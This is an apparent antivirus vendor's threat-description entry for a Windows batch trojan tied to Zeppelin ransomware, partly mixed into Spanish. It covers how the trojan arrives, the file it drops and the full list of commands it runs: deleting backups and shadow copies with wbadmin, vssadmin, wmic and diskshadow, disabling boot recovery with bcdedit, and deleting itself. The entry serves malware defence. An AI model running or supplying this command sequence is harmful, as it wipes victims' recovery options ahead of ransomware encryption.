Trojan.BAT.ZEPPELIN.SMYXBEU.hp
Publish Date: 08 de сентября de 2021
Trojan.Script.Agent.cr (KASPERSKY)
PLATFORM:
Windows
OVER ALL RISK RATING:
DAMAGE POTENTIAL::
DISTRIBUTION POTENTIAL::
REPORTED INFECTION:
INFORMATION EXPOSURE:
Low
Medium
High
Critical
Threat Type:
Trojan
Destructiveness:
No
Encrypted:
No
In the wild::
Yes
OVERVIEW
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Se ejecuta y, a continuación, se elimina.
TECHNICAL DETAILS
File size: 707 bytes
File type: BAT
Memory resident: No
Detalles de entrada
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Instalación
Infiltra los archivos siguientes:
- {Current directory}\sc.txt
Agrega los procesos siguientes:
- wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
- wbadmin DELETE BACKUP -keepVersions:0
- wmic SHADOWCOPY DELETE
- vssadmin Delete Shadows /All /Quiet
- bcdedit /set {default} recoveryenabled No
- bcdedit /set {default} bootstatuspolicy ignoreallfailures
- vssadmin list shadows
- cmd.exe /C wbadmin STOP job
- cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet
- cmd.exe /C wbadmin DELETE CATALOG -quiet
- cmd.exe /C wbadmin DISABLE backup
- cmd.exe /C bcdedit /set {default} recoveryenabled No
- cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
- cd "{Current directory}"
- echo delete shadows all>>sc.txt
- echo exit>>sc.txt
- cmd.exe /C diskshadow -s sc.txt
- del /f "{Current directory}\sc.txt"
- pause
- del %0
Se ejecuta y, a continuación, se elimina.